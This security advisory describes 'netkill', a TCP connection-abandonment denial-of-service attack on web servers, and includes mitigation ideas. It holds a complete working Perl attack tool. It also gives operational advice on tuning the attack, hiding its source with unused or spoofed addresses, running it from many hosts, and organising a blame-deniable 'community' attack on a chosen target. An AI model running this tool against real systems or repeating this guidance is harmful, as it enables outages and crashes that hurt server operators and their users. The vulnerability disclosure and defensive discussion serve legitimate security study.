COMMAND

    TCP/IP

SYSTEMS AFFECTED

    Any system that runs a TCP service that sends out data

PROBLEM

    Stanislav Shalunov posted the following.  By exploiting features
    inherent to the TCP protocol, remote attackers can perform denial
    of service attacks on a wide array of target operating systems.
    The attack is most efficient against HTTP servers.  A Perl script
    is enclosed to demonstrate the problem.  The problem probably
    isn't "new"; many people have likely thought about it before,
    even though Stanislav could not find references on public
    newsgroups and mailing lists.  It is severe and should be fixed.

    When TCPs communicate, each TCP allocates some resources to each
    connection.  By repeatedly establishing a TCP connection and then
    abandoning it, a malicious host can tie up significant resources
    on a server.  A Unix server may dedicate a number of mbufs
    (kernel data structures used to hold network-traffic-related
    data) or even a process to each of those connections.  It takes
    time before the connection times out and resources are returned
    to the system.  If there are many such outstanding abandoned
    connections, the system may crash, become unusable, or simply
    stop serving a particular port.  Web servers are particularly
    vulnerable to this attack because of the nature of the protocol
    (a short request generates an arbitrarily long response).  Remote
    users can make a service (such as HTTP) unavailable.  On many
    operating systems, the servers can be crashed (which interrupts
    service and also has the potential of damaging filesystems).

    This could be made to  work against various services.   We'll only
    discuss how  it could  be used  against HTTP  servers.  The attack
    may or may not render the  rest of the services (if any)  provided
    by the machine unusable.

    The mechanism is quite simple: after instructing our kernel not
    to answer any packets from the target machine (most easily done
    by firewalling that box: with ipfw, "ipfw add deny ip from TARGET
    to any"), we repeatedly initiate a new connection from a random
    port by sending a SYN packet, expecting a SYN+ACK response, and
    then sending our request (we could more traditionally first
    acknowledge the SYN+ACK and only then send the request, but doing
    it our way saves packets).

    It is felt that the attack is more efficient when a static file
    is fetched this way rather than dynamic content.  The nature of
    the file doesn't matter (graphics, text or plain HTML will do
    fine) but its size is of great importance.  What happens on the
    server when it receives these spurious requests?  First of all,
    the kernel handles the TCP handshake; then, as we send our second
    packet and the handshake is thus completed, a user application is
    notified about the request (the accept system call returns, and
    the connection is now ESTABLISHED).  At that time, the kernel has
    the request data in the receive queue.  The process reads the
    request (which is HTTP/1.0 without any keep-alive options),
    interprets it, and then writes some data into the file descriptor
    and closes it (the connection goes into the FIN_WAIT_1 state).
    Life then goes on with some mbufs eaten, if we reach this point.
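
    The server-side sequence just described can be sketched with a
    toy responder (a Python illustration, not part of the original
    advisory; the 16KB body is an arbitrary stand-in for a static
    file):

```python
import socket

def serve_one(listener):
    # The kernel completes the TCP handshake; accept() returns once
    # the connection is ESTABLISHED, with the request already queued.
    conn, addr = listener.accept()
    request = conn.recv(4096)        # read the HTTP/1.0 request
    if request.startswith(b"GET"):
        # Write some data into the file descriptor...
        conn.sendall(b"HTTP/1.0 200 OK\r\n\r\n" + b"x" * 16384)
    # ...and close it; the connection goes into FIN_WAIT_1 and the
    # kernel keeps any unacknowledged data queued in mbufs.
    conn.close()
```

    If the peer stops acknowledging, the write either blocks (process
    saturation) or the close leaves the queued data to the kernel
    (mbuf exhaustion)--the two flavors discussed next.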

    This attack comes in two flavors: mbuf exhaustion and process
    saturation.

    When doing mbuf exhaustion, one wants the user-level process on
    the other end to write the data without blocking and close the
    descriptor.  The kernel will have to deal with all the data, and
    the user-level process will be free, so we can send more requests
    this way and eventually consume all the mbufs, or all physical
    memory if mbufs are allocated dynamically.

    When doing process saturation, one wants the user-level process
    to block while trying to write data.  The architecture of many
    HTTP servers allows serving only so many connections at a time.
    When we reach this number of connections, the server stops
    responding to legitimate users.  If the server doesn't put a
    bound on the number of connections, we're still tying up
    resources, and eventually the machine comes to a crawling halt.

    Mbuf exhaustion usually has no visible effect (other than
    thousands of connections in the FIN_WAIT_1 state) until we reach
    a hard limit on the number of mbufs or mbuf clusters.  At that
    point, the machine panics, dumps kernel core, reboots, checks
    filesystems, recovers the core dump--all time-consuming
    operations.  (This is what happens, say, with FreeBSD and other
    BSD-derived systems; it worked for me against a machine with
    maxusers=256 and 512MB of RAM.)  Some other systems, such as
    Linux, seem to happily allocate arbitrary amounts of memory for
    mbuf clusters.  This memory cannot be paged out.  Once we start
    approaching the physical memory size, the machine becomes
    completely unusable and stays so.

    Process saturation usually manifests itself as the server being
    extremely slow to accept new connections.  On the machine itself
    there is a large number of ESTABLISHED connections, and a large
    number of processes/threads visible.

    Once the process saturation attack succeeds and while it lasts,
    clients trying to connect to the server usually all time out.
    Even if they manage to establish a connection (this is only
    tested with Apache), the server may not send any data for a long
    time.

    Due to a lack of consenting targets and time, I have not done any
    attacks over modem dial-up links, so this section is mostly
    speculation.  Let T be the average time that the target system
    retains a connection of a given kind, R the average time between
    two "hits" by one attacking system, N the number of attacking
    systems, and A the number of packets the victim sends before
    resetting the connection when the peer is unresponsive.  Then, T
    seconds after the beginning of the attack, the victim will have
    N*T/R hung connections.  That number won't change much afterwards.

    A "typical" BSD system with maxusers=64 would have 1536 mbuf
    clusters.  It looks like T is around 500s.  So, if we can get
    R=.3s (easily done if we have a good connection) we can crash it
    from a single client.  For dial-up, a more realistic value of R
    would be around 2s (adjusted for redials).  So, six or so
    cooperating dial-up attackers are required to crash the target.
    (In real life we might need more attackers; my guess is that ten
    should be enough.)
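
    As a sanity check, the N*T/R formula above can be evaluated with
    the figures quoted in the text (a small Python sketch, not part
    of the original advisory):

```python
def hung_connections(n, t, r):
    """Hung connections T seconds into the attack: N * T / R."""
    return n * t / r

# One well-connected client (R = 0.3s) against a maxusers=64 BSD
# box that retains connections for T = 500s:
assert hung_connections(1, 500, 0.3) > 1536   # exceeds 1536 mbuf clusters

# Six dial-up attackers (R = 2s) land just short of the limit,
# which is why ten are suggested as the safer estimate:
assert hung_connections(6, 500, 2) == 1500
assert hung_connections(10, 500, 2) > 1536
```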

    Linux doesn't  have a  limit on  the number  of mbuf clusters, and
    it keeps connections hanging  around longer (T=1400s).   In tests,
    Stanislav was  able to  let it  accept 48K  of data  into the send
    queue and  let the  process move  on.   This means  that a  single
    dial-up attacker can lock  about 33MB in non-paged  kernel memory.
    Four dial-up attackers seem to be able to destroy a 128MB machine.
    A single well-connected  client can do  the same, for  even bigger
    machines.
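
    The memory figure can be checked directly (a Python sketch using
    the numbers above):

```python
conns = 1400 / 2              # T = 1400s, R = 2s: hung connections per attacker
locked = conns * 48 * 1024    # bytes locked in unpageable kernel memory
assert conns == 700
assert 32 < locked / 2**20 < 34    # about 33MB per dial-up attacker
assert 4 * locked / 2**20 > 128    # four attackers swamp a 128MB box
```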

    Process saturation is even easier.  Assuming (optimistically for
    the victim) T=500s, R=2s, a single dial-up user can tie up 250
    instances of the HTTP server.  For most configurations, that's
    the end of the service.
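
    The same arithmetic gives the process-saturation estimate
    (Python sketch):

```python
T, R = 500, 2       # seconds retained per connection, seconds per hit
busy = T / R
assert busy == 250  # HTTP server instances tied up by one dial-up user
```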

    TCP is a complicated business.  Parameters and timing are
    everything.  Tweaking the window size and the delays makes a lot
    of difference.  Parallel threads of execution increase efficiency
    in some settings.  Stanislav did not include code for that, so
    one will have to start several copies of netkill.  For maximum
    efficiency, don't mix the types of attack.  Starting netkill on
    several machines has a lot of impact.  Increasing the number of
    BPF devices on a BSD system may be necessary.

    Netkill does consume  bandwidth, even though  it's not a  flooding
    tool.  Ironically, most of  the traffic is produced by  the victim
    systems, and the  traffic is directed  to attack systems.   If the
    attacking  systems  have  T1  or  greater connectivity, this is of
    little consequence.   However, if  netkill is  used from  a  modem
    dial-up connection it'll be  necessary for the attacker  to redial
    often to get a new IP number.  Cable modems seem to be  unsuitable
    for launching  this attack:  bandwidth is  not sufficient,  and IP
    number cannot be changed.

    One might want to conceal the  origin of the attack.  Since  a TCP
    connection is established, we must  either be able to see  SYN+ACK
    or to guess the remote initial  sequence number.  It is felt  that
    full-blown  IP  spoofing  with  predicting  sequence numbers would
    make  this  attack  inefficient,  even  if  ISNs  are not properly
    randomized by the remote  end.  What one  might do is to  send the
    queries from an unused  IP on the same  network.  This would  have
    the added  benefit that  it would  become unnecessary  to firewall
    the target.  If the network administrator is not very skilled,  it
    might take significant  time for the  true source of  attack to be
    discovered.  One could further fake the link-layer source address
    (if the OS allows that) to make the source even harder to
    discover.

    We've seen a number of distributed attack tools become publicly
    available in the last few months.  They mostly simply flood the
    network with UDP packets and all kinds of garbage.  This attack
    is different from those: rather than saturating the link, it
    saturates resources on the target machines.  If used in
    combination with a controlling daemon from a large number of
    hosts, this attack will have a very devastating effect on
    Web-serving infrastructure--much more devastating than trin00,
    TFN, or Stacheldraht.  (When used in a distributed setting, Perl
    with a non-standard module may not be the executable format of
    choice.  The Perl script would probably be compiled into a
    statically linked native executable using the O module.  This
    will also require building a .a format RawIP library.)

    An  interesting  application  of   netkill  would  be   "Community
    netkill":  a  large  number  of  people  (say, readers of the same
    newsgroups  or  of  the  same  website)  could  coordinate   their
    resources and start using netkill  on a pre-specified target in  a
    pre-specified time interval.  Since each person would send only  a
    few packets,  it would  be hard  to accuse  them of doing anything
    evil ("I just opened this page, and then my modem  disconnected"),
    but this attack can pretty much destroy anything.

    The effects on a load-balancing farm of servers will depend on
    how the load balancing is organized.  Load balancers that simply
    forward packets for each connection to a chosen server give the
    attacker the opportunity to destroy all the machines behind the
    balancer, so they offer no protection.  The load balancer itself
    will most likely remain unaffected.  If the "sticky bit" is set
    on the load balancer, an attacker operating from a single IP will
    only be able to affect a single system at a time.

    For load-balancers that establish  connections and pump data  back
    and   forth   (this   includes   reverse   proxies),  the  servers
    themselves  are  protected  and  the  target  of the attack is the
    load-balancer itself. It's probably  more resilient to the  attack
    than  a  regular  host,  but  with  a  distributed  attack  it can
    certainly  be  taken  down.    Then  the  whole  service   becomes
    unavailable at once.

    Round-robin DNS  load-balancing schemes  are not  really different
    from just individual servers.

    Redirect load-balancing is  probably most vulnerable,  because the
    redirect  box  is  the  single  point  of  failure, and it's not a
    specialized  piece  of  hardware,  like  a  reverse  proxy.   (The
    redirector  can  be  a  farm  of machines load-balanced in another
    way;  still  this  setup  is  more  vulnerable  than,  say,  load-
    balancing all available servers using a Cisco Local Director.)

    The program below takes a number of arguments.  To prevent script
    kiddies from destroying too much of the Web, the author made the
    default values not-so-efficient (but still enough to demonstrate
    that the problem exists).  You'll have to understand how it works
    to make the best use of it, if you decide to research the problem
    further.  With the default values, it at least won't crash a
    large server over a dial-up connection.

    use strict;
    use Net::RawIP ':pcap';		# Available from CPAN.
    use Socket;
    use Getopt::Std;

    # Process command line arguments.
    my %options;
    getopts('zvp:t:r:u:w:i:d:', \%options) or usage();
    my $zero_window = $options{z};		# Close window in second packet?
    my $verbose = $options{v};		# Print progress indicators?
    my $d_port = $options{p} || 80;		# Destination port.
    my $timeout = $options{t} || 1;		# Timeout for pcap.
    my $fake_rtt = $options{r} || 0.05;	# Max sleep between SYN and data.
    my $url = $options{u} || '/';		# URL to request.
    my $window = $options{w} || 16384;	# Window size.
    my $interval = $options{i} || 0.5;	# Sleep time between `connections.'
    my $numpackets = $options{d} || -1;	# Number of tries (-1 == infty).
    my $d_name = shift or usage();		# Target host name.
    shift and usage();			# Complain if other args present.

    # This is what we send to the remote host.
    # XXX: Must fit into one packet.
    my $data = "GET $url HTTP/1.0\015\012\015\012";	# Two network EOLs in the end.

    my ($d_canon, $d_ip) = (gethostbyname($d_name))[0,4]	# Resolve $d_name once.
      or die "$d_name: Unknown host\n";
    my $d_ip_str = inet_ntoa($d_ip);	# Filter wants string representation.
    my $dev = rdev($d_name) or die "$d_name: Cannot find outgoing interface\n";
    my $s_ip_str = ${ifaddrlist()}{$dev} or die "$dev: Cannot find IP\n";

    $| = 1 if $verbose;
    print <<EOF if $verbose;
    Sending to destination $d_canon [$d_ip_str].
    Each dot indicates 10 semi-connections (actually, SYN+ACK packets).
    EOF

    my $hitcount;	# Used for progress indicator if $verbose is set.

    while ($numpackets--) {
      # Unfortunately, there's pcapinit, but there's no way to give
      # resources back to the kernel (close the bpf device or whatever).
      # So, we fork a child for each pcapinit allocation and let him exit.
      my $pid = fork();
      sleep 1, next unless defined $pid;	# fork() failed (returns undef); sleep and retry.
      for (1..10) {rand}	# Need to advance it manually, only children use rand.
      if ($pid) {
        # Parent.  Block until the child exits.
        waitpid($pid, 0);
        print '.' if $verbose && !$? && !(++$hitcount%10);
        select(undef, undef, undef, rand $interval);
      }
      else {
        # Child.
        my $s_port = 1025 + int rand 30000;	# Random source port.
        my $my_seq = int rand 2147483648;	# Random sequence number.
        my $packet = new Net::RawIP({tcp => {}});
        my $filter =	# pcap filter to get SYN+ACK.
          "src $d_ip_str and tcp src port $d_port and tcp dst port $s_port";
        local $^W;	# Unfortunately, Net::RawIP is not -w - OK.
        my $pcap;
        # If we don't have enough resources locally, pcapinit will die/croak.
        # We want to catch the error, hence eval.
        eval q{$pcap = $packet->pcapinit($dev, $filter, 1500, $timeout)};
        $verbose ? die "child died: $@" : exit 1 if $@;
        my $offset = linkoffset($pcap);	# Link header length (14 or whatever).
        $^W = 1;
        # Send the first packet: SYN.
        $packet->set({ip=>  {saddr=>$s_ip_str, daddr=>$d_ip_str, frag_off=>0,
			     tos=>0, id=>int rand 50000},
		      tcp=> {source=>$s_port, dest=>$d_port, syn=>1,
			     window=>$window, seq=>$my_seq}});
        $packet->send;
        my $temp;
        # Put their SYN+ACK (binary packed string) into $ipacket.
        my $ipacket = &next($pcap, $temp);
        exit 1 unless $ipacket;	# Timed out waiting for SYN+ACK.
        my $tcp = new Net::RawIP({tcp => {}});
        # Load $ipacket without link header into a readable data structure.
        $tcp->bset(substr($ipacket, $offset));
        $^W = 0;
        # All we want from their SYN+ACK is their sequence number.
        my ($his_seq) = $tcp->get({tcp=>['seq']});
        # It might increase the interval between retransmits with some
        # TCP implementations if we wait a little bit here.
        select(undef, undef, undef, rand $fake_rtt);
        # Send ACK for SYN+ACK and our data all in one packet.
        # The spec allows it, and it works.
        # Who told you about "three-way handshake"?
        $packet->set({ip=>  {saddr=>$s_ip_str, daddr=>$d_ip_str, frag_off=>0,
			     tos=>0, id=>int rand 50000},
		      tcp=> {source=>$s_port, dest=>$d_port, psh=>1, syn=>0,
			     ack=>1, window=>$zero_window? 0: $window,
			     ack_seq=>++$his_seq,
			     seq=>++$my_seq, data=>$data}});
        $packet->send;
        # At this point, if our second packet is not lost, the connection is
        # established.  They can try to send us as much data as they want now:
        # We're not listening anymore.
        # If our second packet is lost, they'll have a SYN_RCVD connection.
        # Hopefully, they can handle even a SYN flood.
        exit 0;
      }
    }

    exit(0);

    sub usage
    {
    die <<EOF;
    Usage: $0 [-vzw#r#d#i#t#p#] <host>
	    -v: Be verbose.  Recommended for interactive use.
	    -z: Close TCP window at the end of the conversation.
	    -p: Port HTTP daemon is running on (default: 80).
	    -t: Timeout for SYN+ACK to come (default: 1s, must be integer).
	    -r: Max fake rtt, sleep between S+A and data packets (default: 0.05s).
	    -u: URL to request (default: `/').
	    -w: Window size (default: 16384).  Can change the type of attack.
	    -i: Max sleep between `connections' (default: 0.5s).
	    -d: How many times to try to hit (default: infinity).

    See "perldoc netkill" for more information.
    EOF
    }

SOLUTION

    There are several possible workaround strategies.  None gives you
    a lot of protection, but they can be combined.

        * Identify offending sources as they appear and block them  at
          your firewall.
        * Don't let strangers send TCP packets to your servers. Use  a
          hardware reverse proxy. Make sure the proxy can be  rebooted
          very fast.
        * Have a lot of  memory in your machines. Increase  the number
          of mbuf clusters to a very large number.
        * If you have a router  or firewall that can throttle  per-IP
          incoming rates of certain packets, then something like "one
          SYN per X seconds per IP" might limit the damage. You could
          set X to 1 by default and raise it to 5 in case of an actual
          attack.  Image loading by browsers that don't do HTTP
          keep-alives will be very slow.
        * You  could fake  the RSTs.   Set up  a BSD  machine that can
          sniff all the HTTP traffic.  Kill (send RST with the correct
          sequence number)  any HTTP  connection such  that the client
          has not sent anything  in last X seconds.   You could set  X
          to 60  by default  and lower  it to  5 in  case of an actual
          attack.
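
    For the rate-limiting workaround, the earlier N*T/R arithmetic
    suggests how much a per-IP SYN throttle buys (a Python sketch;
    T = 500s as estimated in the PROBLEM section):

```python
T = 500    # seconds a hung connection is retained
X = 5      # throttle: one SYN per X seconds per source IP
assert T / X == 100       # per-IP cap on hung connections
assert 500 / 0.3 > 1536   # vs. ~1667 unthrottled from one fast client
```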

    A combination of these might save your service.  The first
    method, while being the most labor- and time-consuming, is
    probably the most efficient.  It has the added benefit that the
    attackers will be forced to reveal more and more machines that
    they control; you can later go to their administrators and let
    them know.  The last two methods might do you more harm than
    good, especially if you misconfigure something, but the last
    method is also the most efficient.

    We're dealing here with features inherent to TCP.  It can be
    fixed, but the price to pay is making TCP less reliable.
    However, when the machine crashes, TCP becomes very unreliable,
    to say the least.  Let's address mbuf exhaustion first.  When the
    machine would otherwise crash, is there anything better to do?
    Obviously.  Instead of calling panic(), the kernel might randomly
    free some 25% of the mbuf chains, giving some random preference
    to ESTABLISHED connections.  All the applications using sockets
    associated with these mbufs would be notified with a failed
    system call (ENOBUFS).  Sure, that's not very pleasant.  But is a
    crash better?

    Systems that  do not  currently impose  a limit  on the  number of
    mbufs  (e.g.,  Linux)  should  do  so  and use the above technique
    when the  limit is  reached.   An alternative  opinion is that the
    kernel should stop accepting new connections when there's no  more
    memory for TCBs available.  While this addresses the problem of OS
    crashes (which is an undeniable  bug), it doesn't address the  DoS
    aspect:   the attacker  denies service  to most  users by spending
    only a small amount of resources (mostly bandwidth).

    Process saturation is really an application problem, and can only
    be solved at the application level.  Perhaps Apache should be
    taught to put a timeout on network writes.  Perhaps the default
    limit on the number of children should be raised very
    significantly.  Perhaps Apache could drop connections that have
    not done anything in the last 2*2MSL.